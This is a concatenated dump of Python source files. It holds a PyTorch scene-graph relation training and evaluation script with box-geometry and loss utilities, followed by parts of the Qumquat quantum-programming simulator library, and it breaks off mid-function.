iter_one_epoch(val_roidb, val_loader, args.batch_size, is_training=False)
if args.use_cls:
print('Epoch: {:04d}'.format(epoch),
'loss_train: {:.04f}'.format(np.mean(loss_train)),
'edge_loss_train : {:.04f}'.format(np.mean(edge_loss_train)),
'node_loss_train : {:.04f}'.format(np.mean(node_loss_train)),
'edge_acc_train: {:.04f}'.format(np.mean(edge_acc_train)),
'node_acc_train: {:.04f}'.format(np.mean(node_acc_train)),
'recall_train: {:.04f}'.format(recall_train))
print('loss_val: {:.04f}'.format(np.mean(loss_val)),
'edge_loss_val : {:.04f}'.format(np.mean(edge_loss_val)),
'node_loss_val : {:.04f}'.format(np.mean(node_loss_val)),
'edge_acc_val: {:.04f}'.format(np.mean(edge_acc_val)),
'node_acc_val: {:.04f}'.format(np.mean(node_acc_val)),
'recall_val: {:.04f}'.format(recall_val),
'time: {:.4f}s'.format(time.time() - t))
else:
print('Epoch: {:04d}'.format(epoch),
'loss_train: {:.04f}'.format(np.mean(loss_train)),
'acc_train: {:.04f}'.format(np.mean(edge_acc_train)),
'recall_train: {:.04f}'.format(recall_train),
'loss_val: {:.04f}'.format(np.mean(loss_val)),
'acc_val: {:.04f}'.format(np.mean(edge_acc_val)),
'recall_val: {:.04f}'.format(recall_val),
'time: {:.4f}s'.format(time.time() - t))
torch.save(model.state_dict(), model_file)
if args.save_folder and recall_val > best_val_accuracy:
torch.save(model.state_dict(), best_model_file)
print('--------------Best model so far---------------')
print('Epoch: {:04d}'.format(epoch),
'loss_train: {:.04f}'.format(np.mean(loss_train)),
'acc_train: {:.04f}'.format(np.mean(edge_acc_train)),
'recall_train: {:.04f}'.format(recall_train),
'loss_val: {:.04f}'.format(np.mean(loss_val)),
'acc_val: {:.04f}'.format(np.mean(edge_acc_val)),
'recall_val: {:.04f}'.format(recall_val))
print('Epoch: {:04d}'.format(epoch),
'loss_train: {:.04f}'.format(np.mean(loss_train)),
'acc_train: {:.04f}'.format(np.mean(edge_acc_train)),
'recall_train: {:.04f}'.format(recall_train),
'loss_val: {:.04f}'.format(np.mean(loss_val)),
'acc_val: {:.04f}'.format(np.mean(edge_acc_val)),
'recall_val: {:.04f}'.format(recall_val),
'time: {:.4f}s'.format(time.time() - t), file=log)
log.flush()
return recall_val
def eval(roidb, test_loader, is_rela=False):
t = time.time()
loss_test = []
edge_acc_test = []
node_acc_test = []
model.eval()
if args.mode == 'eval':
model.load_state_dict(torch.load(best_model_file))
else:
model.load_state_dict(torch.load(model_file))
if is_rela:
num_nodes = args.rela_num_atoms
num_edges = num_nodes * (num_nodes - 1)
batch_size = args.eval_batch_size
else:
num_nodes = args.num_atoms
num_edges = args.num_edges
batch_size = args.batch_size
pred_probs = np.zeros([len(test_loader.dataset), num_edges])
pred_cls = np.zeros([len(test_loader.dataset), num_edges]) + args.edge_types - 1
pbar = tqdm(total = len(test_loader.dataset))
for batch_idx, (data, target, node_cls, edge_feats, rel_rec, rel_send, bbox_loc, prior) in enumerate(test_loader):
if args.cuda:
data, target, edge_feats = data.cuda(), target.cuda(), edge_feats.cuda()
rel_rec, rel_send = rel_rec.cuda(), rel_send.cuda()
node_cls, bbox_loc = node_cls.cuda(), bbox_loc.cuda()
data = data[:, :, :].contiguous()
with torch.no_grad():
output, node_output = model(data, edge_feats, rel_rec, rel_send, bbox_loc)
output = output.view(-1, args.edge_types)
node_output = node_output.view(-1, args.node_types)
edge_acc = compute_acc(output, target.view(-1), ignored_index=args.edge_types-1)
node_acc = compute_acc(node_output, node_cls.view(-1), ignored_index=args.node_types-1)
edge_acc_test.append(edge_acc)
node_acc_test.append(node_acc)
output = F.softmax(output, dim=-1)
output = output.view(-1 , num_edges, args.edge_types)
pred_prob, pred_cl = output.max(-1)
if (batch_idx+1)*batch_size > len(test_loader.dataset):
pred_probs[batch_idx*batch_size:] = pred_prob.data.cpu().numpy()
pred_cls[batch_idx*batch_size:] = pred_cl.data.cpu().numpy()
else:
pred_probs[batch_idx*batch_size:(batch_idx+1)*batch_size] = pred_prob.data.cpu().numpy()
pred_cls[batch_idx*batch_size:(batch_idx+1)*batch_size] = pred_cl.data.cpu().numpy()
pbar.update(batch_size)
pbar.close()
if args.use_cls:
print('[acc] edge_acc_test: {:.04f} node_acc_test: {:.04f}'.format(np.mean(edge_acc_test), np.mean(node_acc_test)))
# print('--------Eval-----------------')
if is_rela:
pred_roidb = graph_npy2roidb(roidb, pred_probs, pred_cls, mode='rela', level='image', topk=False)
recall_50 = eval_result(roidb, pred_roidb['pred_roidb'], 50, is_zs=False, mode='rela', topk=False, dataset='vg')
recall_100 = eval_result(roidb, pred_roidb['pred_roidb'], 100, is_zs=False, mode='rela', topk=False, dataset='vg')
zs_recall_50 = eval_result(roidb, pred_roidb['pred_roidb'], 50, is_zs=True, mode='rela', topk=False, dataset='vg')
zs_recall_100 = eval_result(roidb, pred_roidb['pred_roidb'], 100, is_zs=True, mode='rela', topk=False, dataset='vg')
# np.savez(os.path.join(load_folder, 'rela_roidb'), pred_roidb)
print('[rela_eval] recall_50: {:.4f} recall_100: {:.4f}'.format(recall_50, recall_100), file=log)
print('[zs_rela_eval] recall_50: {:.4f} recall_100: {:.4f}'.format(zs_recall_50, zs_recall_100), file=log)
else:
pred_roidb = graph_npy2roidb(roidb, pred_probs, pred_cls, mode='pred', level='image', topk=False)
recall_50 = eval_result(roidb, pred_roidb['pred_roidb'], 50, is_zs=False, mode='pred', topk=False, dataset='vg')
recall_100 = eval_result(roidb, pred_roidb['pred_roidb'], 100, is_zs=False, mode='pred', topk=False, dataset='vg')
zs_recall_50 = eval_result(roidb, pred_roidb['pred_roidb'], 50, is_zs=True, mode='pred', topk=False, dataset='vg')
zs_recall_100 = eval_result(roidb, pred_roidb['pred_roidb'], 100, is_zs=True, mode='pred', topk=False, dataset='vg')
np.savez(os.path.join(load_folder, 'pred_roidb'), pred_roidb)
print('[pred_eval] recall_50: {:.4f} recall_100: {:.4f}'.format(recall_50, recall_100), file=log)
print('[zs_pred_eval] recall_50: {:.4f} recall_100: {:.4f}'.format(zs_recall_50, zs_recall_100), file=log)
print('recall_50: {:.4f} recall_100: {:.4f}'.format(recall_50, recall_100))
print('[zs] recall_50: {:.4f} recall_100: {:.4f}'.format(zs_recall_50, zs_recall_100))
return
def eval_topk(roidb, test_loader, is_rela=False, k=100):
t = time.time()
loss_test = []
acc_test = []
model.eval()
if args.mode == 'eval':
model.load_state_dict(torch.load(best_model_file))
else:
model.load_state_dict(torch.load(model_file))
if is_rela:
num_nodes = args.rela_num_atoms
num_edges = num_nodes * (num_nodes - 1)
batch_size = args.eval_batch_size
else:
num_nodes = args.num_atoms
num_edges = args.num_edges
batch_size = args.batch_size
pred_probs = np.zeros([len(test_loader.dataset), num_edges, k])
pred_cls = np.zeros([len(test_loader.dataset), num_edges, k]) + args.edge_types-1
pbar = tqdm(total = len(test_loader.dataset))
for batch_idx, (data, target, node_cls, edge_feats, rel_rec, rel_send, bbox_loc, prior) in enumerate(test_loader):
if args.cuda:
data, target, edge_feats = data.cuda(), target.cuda(), edge_feats.cuda()
rel_rec, rel_send = rel_rec.cuda(), rel_send.cuda()
node_cls, bbox_loc = node_cls.cuda(), bbox_loc.cuda()
data = data[:, :, :].contiguous()
with torch.no_grad():
output, _ = model(data, edge_feats, rel_rec, rel_send, bbox_loc)
output = output.view(-1, args.edge_types)
output = F.softmax(output, dim=-1)
output = output.view(-1 , num_edges, args.edge_types)
pred_prob, pred_cl = torch.topk(output, k, dim=-1, largest=True, sorted=True)
if (batch_idx+1)*batch_size > len(test_loader.dataset):
pred_probs[batch_idx*batch_size:] = pred_prob.data.cpu().numpy()
pred_cls[batch_idx*batch_size:] = pred_cl.data.cpu().numpy()
else:
pred_probs[batch_idx*batch_size:(batch_idx+1)*batch_size] = pred_prob.data.cpu().numpy()
pred_cls[batch_idx*batch_size:(batch_idx+1)*batch_size] = pred_cl.data.cpu().numpy()
pbar.update(batch_size)
pbar.close()
# print('--------Eval-----------------')
if is_rela:
pred_roidb = graph_npy2roidb(roidb, pred_probs, pred_cls, mode='rela', level='image', topk=True)
recall_50 = eval_result(roidb, pred_roidb['pred_roidb'], 50, is_zs=False, mode='rela', topk=True, dataset='vg')
recall_100 = eval_result(roidb, pred_roidb['pred_roidb'], 100, is_zs=False, mode='rela', topk=True, dataset='vg')
zs_recall_50 = eval_result(roidb, pred_roidb['pred_roidb'], 50, is_zs=True, mode='rela', topk=True, dataset='vg')
zs_recall_100 = eval_result(roidb, pred_roidb['pred_roidb'], 100, is_zs=True, mode='rela', topk=True, dataset='vg')
# np.savez(os.path.join(load_folder, 'topk_rela_roidb'), pred_roidb)
print('[rela_eval_topk] recall_50: {:.4f} recall_100: {:.4f}'.format(recall_50, recall_100), file=log)
print('[zs_rela_eval_topk] recall_50: {:.4f} recall_100: {:.4f}'.format(zs_recall_50, zs_recall_100), file=log)
else:
pred_roidb = graph_npy2roidb(roidb, pred_probs, pred_cls, mode='pred', level='image', topk=True)
recall_50 = eval_result(roidb, pred_roidb['pred_roidb'], 50, is_zs=False, mode='pred', topk=True, dataset='vg')
recall_100 = eval_result(roidb, pred_roidb['pred_roidb'], 100, is_zs=False, mode='pred', topk=True, dataset='vg')
zs_recall_50 = eval_result(roidb, pred_roidb['pred_roidb'], 50, is_zs=True, mode='pred', topk=True, dataset='vg')
zs_recall_100 = eval_result(roidb, pred_roidb['pred_roidb'], 100, is_zs=True, mode='pred', topk=True, dataset='vg')
# np.savez(os.path.join(load_folder, 'topk_pred_roidb'), pred_roidb)
print('[pred_eval_topk] recall_50: {:.4f} recall_100: {:.4f}'.format(recall_50, recall_100), file=log)
print('[zs_pred_eval_topk] recall_50: {:.4f} recall_100: {:.4f}'.format(zs_recall_50, zs_recall_100), file=log)
print('recall_50: {:.4f} recall_100: {:.4f}'.format(recall_50, recall_100))
print('[zs] recall_50: {:.4f} recall_100: {:.4f}'.format(zs_recall_50, zs_recall_100))
return
# Train model
t_total = time.time()
if args.mode == 'whole' or args.mode == 'train':
best_val_accuracy = -1.
best_epoch = 0
pbar = tqdm(total=args.epochs)
for epoch in range(args.epochs):
print('============= Epoch {} ==========='.format(epoch))
val_acc = train(epoch, best_val_accuracy)
if val_acc > best_val_accuracy:
best_val_accuracy = val_acc
best_epoch = epoch
# print('------------- pred --------------')
# eval(test_roidb, test_loader, is_rela=False)
# print('------------- pred topk--------------')
# eval_topk(test_roidb, test_loader, is_rela=False)
pbar.update(1)
pbar.close()
print("======Optimization Finished!======")
print("Best Epoch: {:04d}".format(best_epoch))
if args.save_folder:
print("Best Epoch: {:04d}".format(best_epoch), file=log)
log.flush()
print('------------- pred --------------')
eval(test_roidb, test_loader, is_rela=False)
print('------------- pred topk--------------')
eval_topk(test_roidb, test_loader, is_rela=False)
if log is not None:
print(save_folder)
log.close()
print("Total time elapsed: {:.4f}s".format(time.time() - t_total))
elif args.mode == 'eval':
print('------------- pred --------------')
eval(test_roidb, test_loader, is_rela=False)
print('------------- pred topk--------------')
eval_topk(test_roidb, test_loader, is_rela=False)
if log is not None:
print(load_folder)
log.close()
print("Total time elapsed: {:.4f}s".format(time.time() - t_total))
--- FILE SEPARATOR ---
from __future__ import print_function
import numpy as np
import os
import ipdb
import time
from tqdm import tqdm
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
# def read_roidb(roidb_path):
# '''python2'''
# roidb_file = np.load(roidb_path)
# key = roidb_file.keys()[0]
# roidb_temp = roidb_file[key]
# roidb = roidb_temp[()]
# return roidb
def compute_acc(output, target, ignored_index):
'''
output : [N, N_cls]
target : [N,]; GT category
ignored_index: int; the category that does not count
'''
pred = output.data.max(1, keepdim=True)[1]
count_mask = (target < ignored_index)
correct = (pred.eq(target.data.view_as(pred)) * count_mask.view(-1,1).data).cpu().sum()
count = count_mask.data.cpu().sum()
if count < 0.1:
acc = 0
else:
acc = correct.float()/count.float()
return acc.item()
def compute_iou_each(box1, box2):
'''
function: calculate the iou based on the box ordinates
box1: [x_min, y_min, x_max, y_max]
'''
xA = max(box1[0], box2[0])
yA = max(box1[1], box2[1])
xB = min(box1[2], box2[2])
yB = min(box1[3], box2[3])
if xB<xA or yB<yA:
IoU = 0
else:
area_I = (xB - xA + 1) * (yB - yA + 1)
area1 = (box1[2] - box1[0] + 1)*(box1[3] - box1[1] + 1)
area2 = (box2[2] - box2[0] + 1)*(box2[3] - box2[1] + 1)
IoU = area_I/float(area1 + area2 - area_I)
return IoU
def compute_distance(box1, box2):
cx1 = (box1[0] + box1[2])/2.0
cy1 = (box1[1] + box1[3])/2.0
cx2 = (box2[0] + box2[2])/2.0
cy2 = (box2[1] + box2[3])/2.0
x_min = min(box1[0], box2[0])
y_min = min(box1[1], box2[1])
x_max = max(box1[2], box2[2])
y_max = max(box1[3], box2[3])
I = (cx1 - cx2)**2 + (cy1 - cy2)**2
U = (x_min - x_max)**2 + (y_min - y_max)**2
dis = np.sqrt(I/float(U))
return dis
def get_box_feats(sub_box, obj_box):
'''
box: [x_min, y_min, x_max, y_max]
'''
def _center(box):
x_c = (box[0] + box[2])/2.0
y_c = (box[1] + box[3])/2.0
w = box[2] - box[0]
h = box[3] - box[1]
return np.array([x_c, y_c, w, h])
def _union(box1, box2):
x_min = min(box1[0], box2[0])
y_min = min(box1[1], box2[1])
x_max = max(box1[2], box2[2])
y_max = max(box1[3], box2[3])
return np.array([x_min, y_min, x_max, y_max])
def _six(c_sub_box, c_obj_box):
t_x_so = (c_sub_box[0] - c_obj_box[0])/float(c_sub_box[2])
t_y_so = (c_sub_box[1] - c_obj_box[1])/float(c_sub_box[3])
t_w_so = np.log(c_sub_box[2]/float(c_obj_box[2]))
t_h_so = np.log(c_sub_box[3]/float(c_obj_box[3]))
t_x_os = (c_obj_box[0] - c_sub_box[0])/float(c_obj_box[2])
t_y_os = (c_obj_box[1] - c_sub_box[1])/float(c_obj_box[3])
return np.array([t_x_so, t_y_so, t_w_so, t_h_so, t_x_os, t_y_os])
p_box = _union(sub_box, obj_box)
c_sub_box = _center(sub_box)
c_obj_box = _center(obj_box)
c_p_box = _center(p_box)
six_so = _six(c_sub_box, c_obj_box)
six_sp = _six(c_sub_box, c_p_box)
six_op = _six(c_obj_box, c_p_box)
iou = compute_iou_each(sub_box, obj_box)
dis = compute_distance(sub_box, obj_box)
iou_dis = np.array([iou, dis])
output = np.concatenate([six_so, six_sp, six_op, iou_dis],0)
return output
def encode_onehot(labels):
classes = set(labels)
classes_dict = {c: np.identity(len(classes))[i, :] for i, c in
enumerate(classes)}
labels_onehot = np.array(list(map(classes_dict.get, labels)),
dtype=np.int32)
return labels_onehot
def sample_gumbel(shape, eps=1e-10):
"""
NOTE: Stolen from https://github.com/pytorch/pytorch/pull/3341/commits/327fcfed4c44c62b208f750058d14d4dc1b9a9d3
Sample from Gumbel(0, 1)
based on
https://github.com/ericjang/gumbel-softmax/blob/3c8584924603869e90ca74ac20a6a03d99a91ef9/Categorical%20VAE.ipynb ,
(MIT license)
"""
U = torch.rand(shape).float()
return - torch.log(eps - torch.log(U + eps))
def gumbel_softmax_sample(logits, tau=1, eps=1e-10):
"""
NOTE: Stolen from https://github.com/pytorch/pytorch/pull/3341/commits/327fcfed4c44c62b208f750058d14d4dc1b9a9d3
Draw a sample from the Gumbel-Softmax distribution
based on
https://github.com/ericjang/gumbel-softmax/blob/3c8584924603869e90ca74ac20a6a03d99a91ef9/Categorical%20VAE.ipynb
(MIT license)
"""
gumbel_noise = sample_gumbel(logits.size(), eps=eps)
if logits.is_cuda:
gumbel_noise = gumbel_noise.cuda()
y = logits + Variable(gumbel_noise)
return my_softmax(y / tau, axis=-1)
def gumbel_softmax(logits, tau=1, hard=False, eps=1e-10):
"""
NOTE: Stolen from https://github.com/pytorch/pytorch/pull/3341/commits/327fcfed4c44c62b208f750058d14d4dc1b9a9d3
Sample from the Gumbel-Softmax distribution and optionally discretize.
Args:
logits: [batch_size, n_class] unnormalized log-probs
tau: non-negative scalar temperature
hard: if True, take argmax, but differentiate w.r.t. soft sample y
Returns:
[batch_size, n_class] sample from the Gumbel-Softmax distribution.
If hard=True, then the returned sample will be one-hot, otherwise it will
be a probability distribution that sums to 1 across classes
Constraints:
- this implementation only works on batch_size x num_features tensor for now
based on
https://github.com/ericjang/gumbel-softmax/blob/3c8584924603869e90ca74ac20a6a03d99a91ef9/Categorical%20VAE.ipynb ,
(MIT license)
"""
y_soft = gumbel_softmax_sample(logits, tau=tau, eps=eps)
if hard:
shape = logits.size()
_, k = y_soft.data.max(-1)
# this bit is based on
# https://discuss.pytorch.org/t/stop-gradients-for-st-gumbel-softmax/530/5
y_hard = torch.zeros(*shape)
if y_soft.is_cuda:
y_hard = y_hard.cuda()
y_hard = y_hard.zero_().scatter_(-1, k.view(shape[:-1] + (1,)), 1.0)
# this cool bit of code achieves two things:
# - makes the output value exactly one-hot (since we add then
# subtract y_soft value)
# - makes the gradient equal to y_soft gradient (since we strip
# all other gradients)
y = Variable(y_hard - y_soft.data) + y_soft
else:
y = y_soft
return y
def read_roidb(roidb_path):
''' python3 '''
roidb_file = np.load(roidb_path, encoding='latin1')
key = list(roidb_file.keys())[0]
roidb_temp = roidb_file[key]
roidb = roidb_temp[()]
return roidb
def box_id(ori_box, uni_box):
'''
input:
ori_box: the sub or obj box ordinates
uni_box: the unique box ordinates
output:
the idx of the ori_box based on the unique box
'''
idx = []
for i in range(len(ori_box)):
for j in range(len(uni_box)):
if np.array_equal(ori_box[i], uni_box[j]):
idx.append(j)
return idx
def compute_iou_each(box1, box2):
'''
function: calculate the iou based on the box ordinates
box1: [x_min, y_min, x_max, y_max]
'''
xA = max(box1[0], box2[0])
yA = max(box1[1], box2[1])
xB = min(box1[2], box2[2])
yB = min(box1[3], box2[3])
if xB<xA or yB<yA:
IoU = 0
else:
area_I = (xB - xA + 1) * (yB - yA + 1)
area1 = (box1[2] - box1[0] + 1)*(box1[3] - box1[1] + 1)
area2 = (box2[2] - box2[0] + 1)*(box2[3] - box2[1] + 1)
IoU = area_I/float(area1 + area2 - area_I)
return IoU
def get_item(arr, idx, idy):
out = np.zeros(len(idx))
for i in range(len(idx)):
out[i] = arr[idx[i], idy[i]]
return out
def encode_onehot(labels):
classes = set(labels)
classes_dict = {c: np.identity(len(classes))[i, :] for i, c in
enumerate(classes)}
labels_onehot = np.array(list(map(classes_dict.get, labels)),
dtype=np.int32)
return labels_onehot
def one_hot_embedding(labels, num_classes):
'''Embedding labels to one-hot form.
Args:
labels: (LongTensor) class labels, sized [N,].
num_classes: (int) number of classes.
Returns:
(tensor) encoded labels, sized [N,#classes].
'''
y = torch.eye(num_classes) # [D,D]
return y[labels] # [N,D]
class FocalLoss(nn.Module):
def __init__(self, num_classes=20, alpha=0.25, gamma=2):
super(FocalLoss, self).__init__()
self.num_classes = num_classes
self.alpha = alpha
self.gamma = gamma
def forward(self, x, y):
'''Focal loss.
Args:
x: (tensor) sized [N,D].
y: (tensor) sized [N,].
Return:
(tensor) focal loss.
'''
t = one_hot_embedding(y.data.cpu(), 1+self.num_classes) # [N,D]
t = t[:,:self.num_classes] # exclude background
t = Variable(t).cuda() # [N,D-1]
x = x[:,:self.num_classes]
p = F.softmax(x, dim=-1)
pt = p*t + (1-p)*(1-t) # pt = p if t > 0 else 1-p
w = self.alpha*t + (1-self.alpha)*(1-t) # w = alpha if t > 0 else 1-alpha
w = w * (1-pt).pow(self.gamma)
return F.binary_cross_entropy_with_logits(p.log(), t, w, reduction='none').sum(-1)
|
[
"/DataLoader.py",
"/eval_metrics.py",
"/modules.py",
"/preprocess/ass_fun.py",
"/preprocess/extract_vgg_feature.py",
"/preprocess/process.py",
"/preprocess/vgg.py",
"/train_vg.py",
"/utils.py"
] |
00mjk/Qumquat
|
name = "qumquat"
from .main import Qumquat
import sys
sys.modules[__name__] = Qumquat()
--- FILE SEPARATOR ---
from .qvars import *
# control.py
# - inv
class Control:
######################## Invert
def inv(self):
class WrapInv():
def __enter__(s):
self.push_mode("inv")
self.queue_stack.append([])
def __exit__(s, *args):
self.pop_mode("inv")
queue = self.queue_stack.pop()
for tup in queue[::-1]:
self.call(tup, invert=True)
return WrapInv()
################### If
def control(self, expr):
expr = Expression(expr, self)
class WrapIf():
def __enter__(s):
self.push_mode("control")
self.do_control(expr)
def __exit__(s, *args):
self.pop_mode("control")
self.do_control_inv(expr)
return WrapIf()
def do_control(self, expr):
if self.queue_action("do_control", expr): return
self.controls.append(expr)
def do_control_inv(self, expr):
if self.queue_action("do_control_inv", expr): return
self.controls.pop()
--- FILE SEPARATOR ---
from .qvars import *
class Garbage:
################### Garbage
# a decorator that makes function into a with statement
def garbage(self, f):
class WrapGarbage(Expression):
def __init__(s, *args, **kwargs):
s.args = args
s.kwargs = kwargs
s.called = False
s.compute = None
s.keys = set([])
for arg in list(args) + list(kwargs.values()):
if isinstance(arg, Expression):
s.keys |= arg.keys
if isinstance(arg, Key):
s.keys |= set([arg.key])
def run_without_garbage(b):
if not s.called:
s.called = True
out = Expression(f(*s.args, **s.kwargs))
s.compute = out.c
return s.compute(b)
s.c = lambda b: run_without_garbage(b)
s.float = True # can't be determined now, assume the worst.
s.qq = self
def __enter__(s):
if s.called:
raise SyntaxError("Function was already evaluated previously - use in with statement at first function call.")
self.queue_stack.append([])
self.pile_stack_py.append([])
out = Expression(f(*s.args, **s.kwargs))
s.pile = self.pile_stack_py.pop()
return out
def __exit__(s, ty,val,tr): # ignore exception stuff
self.pile_stack_py.append(s.pile)
with self.inv(): f(*s.args, **s.kwargs)
pile = self.pile_stack_py.pop()
queue = self.queue_stack.pop()
self.do_garbage(queue, pile)
def wrapper(*args,**kwargs):
return WrapGarbage(*args,**kwargs)
return wrapper
def do_garbage(self, queue, pile):
if self.queue_action("do_garbage", queue, pile): return
self.pile_stack_qq.append(pile)
for tup in queue: self.call(tup)
newpile = self.pile_stack_qq.pop()
if len(newpile) > 0:
raise SyntaxError("Garbage collector error: pile was not clean after uncomputation.")
def do_garbage_inv(self, queue, pile):
if self.queue_action("do_garbage_inv", queue, pile): return
self.queue_stack.append([]) # just reverse the queue
for tup in queue[::-1]: self.call(tup, invert=True)
rev_queue = self.queue_stack.pop()
# also reverse the pile
pile = pile[::-1]
self.do_garbage(rev_queue, pile)
--- FILE SEPARATOR ---
from .qvars import *
import math, copy
class Init:
############################ Base routines
def init(self, key, val):
if self.queue_action('init', key, val): return
self.assert_mutable(key)
# cast ranges to superpositions, permitting qq.reg(range(3))
if isinstance(val, range): val = list(val)
if isinstance(val, Key): val = Expression(val)
if isinstance(val, int) or isinstance(val, es_int): val = Expression(val, self)
if isinstance(val, Expression):
self.init_expression(key,val)
elif isinstance(val, list):
self.init_list(key,val)
elif isinstance(val, dict):
self.init_dict(key,val)
else:
raise TypeError("Invalid initialization of register with type ", type(val))
# takes a register and a guess for what state it is in
# if the guess is correct, the register is set to |0>
def init_inv(self, key, val):
if self.queue_action('init_inv', key, val): return
self.assert_mutable(key)
if isinstance(val, range): val = list(val)
if isinstance(val, Key): val = Expression(val)
if isinstance(val, int) or isinstance(val, es_int): val = Expression(val, self)
if isinstance(val, Expression):
self.init_expression(key,val,invert=True)
elif isinstance(val, list):
self.init_list(key,val,invert=True)
elif isinstance(val, dict):
self.init_dict(key,val,invert=True)
else:
raise TypeError("Invalid un-initialization of register with type ", type(val))
############################ Expression
def init_expression(self,key,expr, invert=False):
if expr.float: raise TypeError("Quantum registers can only contain ints")
if key.key in expr.keys: raise SyntaxError("Can't initialize register based on itself.")
# strategy:
# for each value of expr, create a list [0,expr,other,initial,vals]
# then the unitary simply shifts forward by one
H = set([b[key.index()] for b in self.controlled_branches()]) - set([es_int(0)])
for b in self.controlled_branches():
v = es_int(expr.c(b))
if v != es_int(0): # if already zero do nothing
thisH = [es_int(0),v] + sorted(list(H - set([v])))
idx = thisH.index(b[key.index()])
if not invert:
b[key.index()] = thisH[(idx + 1) % len(thisH)]
else:
b[key.index()] = thisH[(len(thisH) + idx - 1) % len(thisH)]
############################ List
def init_list(self,key,ls, invert=False):
# check list for validity, cast to es_int
for i in range(len(ls)):
if not (isinstance(ls[i], int) or isinstance(ls[i], es_int)):
raise TypeError("Superpositions only support integer literals.")
if ls.index(ls[i]) != i:
raise ValueError("Superpositions can't contain repeated values.")
if isinstance(ls[i], int):
ls[i] = es_int(ls[i])
p = 1/math.sqrt(len(ls))
H = (set([b[key.index()] for b in self.controlled_branches()]) | set(ls)) - set([es_int(0)])
H = [es_int(0)] + list(H)
U = [{h:complex(p if (h in ls) else 0) for h in H}] # first column of U
# complete the rest of the matrix via graham schmidt
for i in H[1:]+H[:1]: # this way its closer to the identity
newcol = {h:complex(1 if (h == i) else 0) for h in H}
for col in U:
inner = sum([col[h].conjugate()*newcol[h] for h in H])
for h in H: newcol[h] -= col[h]*inner
# normalize
norm = math.sqrt(sum([abs(newcol[h])**2 for h in H]))
if norm < self.thresh: continue
for h in H: newcol[h] /= norm
U.append(newcol)
if len(U) != len(H): raise ValueError("Error in matrix completion. (This can happen when amplitudes get too small.)")
if invert:
newU = []
for i in H:
newU.append({h:(U[H.index(h)][i].conjugate()) for h in H})
U = newU
newbranches = []
goodbranch = lambda b: all([ctrl.c(b) != 0 for ctrl in self.controls])
for b in self.branches:
if not goodbranch(b):
newbranches.append(b)
continue
row = U[H.index(b[key.index()])]
for h in H:
if abs(row[h]) != 0:
newbranch = copy.copy(b)
newbranch[key.index()] = h
newbranch["amp"] *= row[h]
newbranches.append(newbranch)
self.branches = newbranches
self.prune()
############################ Dictionary
def init_dict(self,key,dic,invert=False):
# check if dictionary has integer keys, cast to es_int
newdic = {}
keys = set([])
for k in dic.keys():
if not isinstance(k, int): raise TypeError("QRAM keys must be integers.")
newdic[es_int(k)] = Expression(dic[k], qq=self)
keys |= newdic[es_int(k)].keys
dic = newdic
if key.key in keys: raise SyntaxError("Can't initialize register based on itself.")
keys = [Key(self,val=k) for k in keys]
############## sort branches into groups with equal value
def branchesEqual(b1, b2):
for k in keys:
if self.branches[b1][k.index()] != self.branches[b2][k.index()]:
return False
return True
branch_type_counter = 0
branchtypes = {}
goodbranch = lambda b: all([ctrl.c(b) != 0 for ctrl in self.controls])
for i in range(len(self.branches)):
b = self.branches[i]
if not goodbranch(b): continue
found = False
for j in branchtypes:
if branchesEqual(branchtypes[j][0], i):
found = True
branchtypes[j].append(i)
break
if not found:
branchtypes[branch_type_counter] = [i]
branch_type_counter += 1
continue
############ determine unitary for each group
H = set([b[key.index()] for b in self.controlled_branches()])
H = (H | set(dic.keys())) - set([es_int(0)])
H = [es_int(0)] + list(H)
unitaries = []
for j in range(branch_type_counter):
norm = 0
for k in dic.keys(): norm += abs( dic[k].c(self.branches[branchtypes[j][0]]) )**2
norm = math.sqrt(norm)
U = [{h:(dic[h].c(self.branches[branchtypes[j][0]])/norm\
if h in dic.keys() else complex(0)) for h in H}]
# complete the rest of the matrix via graham schmidt
for i in H[1:]+H[:1]: # this way its closer to the identity
newcol = {h:complex(1 if (h == i) else 0) for h in H}
for col in U:
inner = sum([col[h].conjugate()*newcol[h] for h in H])
for h in H: newcol[h] -= col[h]*inner
# normalize
norm = math.sqrt(sum([abs(newcol[h])**2 for h in H]))
if norm < self.thresh: continue
for h in H: newcol[h] /= norm
U.append(newcol)
if len(U) != len(H): raise ValueError("Error in matrix completion. (This can happen when amplitudes get too small.)")
if invert:
newU = []
for i in H:
newU.append({h:(U[H.index(h)][i].conjugate()) for h in H})
unitaries.append(newU)
else:
unitaries.append(U)
########### apply unitary
newbranches = []
for i in range(len(self.branches)):
b = self.branches[i]
if not goodbranch(b):
newbranches.append(b)
continue
for j in range(branch_type_counter):
if i in branchtypes[j]: break
U = unitaries[j]
row = U[H.index(b[key.index()])]
for h in H:
if abs(row[h]) != 0:
newbranch = copy.copy(b)
newbranch[key.index()] = h
newbranch["amp"] *= row[h]
newbranches.append(newbranch)
self.branches = newbranches
self.prune()
--- FILE SEPARATOR ---
from .qvars import *
import cmath
# keys.py:
# - clear
# - prune
# - alloc
# - reg
# - clean
# - expr
class Keys:
############################ Clear and prune
# delete all variables and start anew
def clear(self):
if len(self.controls) > 0 or len(self.queue_stack) > 0 or\
len(self.pile_stack_py) > 0 or len(self.mode_stack) > 0:
raise SyntaxError("Cannot clear inside quantum control flow.")
self.key_dict = {}
self.branches = [{"amp": 1+0j}]
# get rid of branches with tiny amplitude
# merge branches with same values
def prune(self):
norm = 0
mergedbranches = []
for branch in self.branches:
found = False
for comp_branch in mergedbranches:
same = True
for key in branch.keys():
if key == "amp": continue
if branch[key] != comp_branch[key]:
same = False
break
if same:
found = True
comp_branch["amp"] += branch["amp"]
if not found: mergedbranches.append(branch)
newbranches = []
for branch in mergedbranches:
if abs(branch["amp"]) > self.thresh:
newbranches.append(branch)
for branch in newbranches:
norm += abs(branch["amp"])**2
norm = cmath.sqrt(norm)
self.branches = newbranches
for branch in self.branches:
branch["amp"] /= norm
############################ Alloc and dealloc
def alloc(self, key):
if self.queue_action('alloc', key): return
self.assert_mutable(key)
if key.allocated():
raise SyntaxError("Attempted to allocate already allocated key.")
reg = self.reg_count
self.key_dict[key.key] = reg
self.reg_count += 1
for branch in self.branches: branch[reg] = es_int(0)
def alloc_inv(self, key):
if self.queue_action('alloc_inv', key): return
self.assert_mutable(key)
if key.allocated(): # this is just a regular key deallocation
target = key
proxy = None
else: # we are the proxy for another key
target = key.partner()
proxy = key
for branch in self.controlled_branches():
if branch[target.index()] != 0: raise ValueError("Failed to clean register.")
# remove the register from the branches and key_dict
for branch in self.branches: branch.pop(target.index())
self.key_dict[target.key] = None
pile = key.pile()
if not target.allocated() and pile is not None:
# remove proxy if it exists
if proxy is not None:
for i in range(len(pile)):
if pile[i].key == proxy.key:
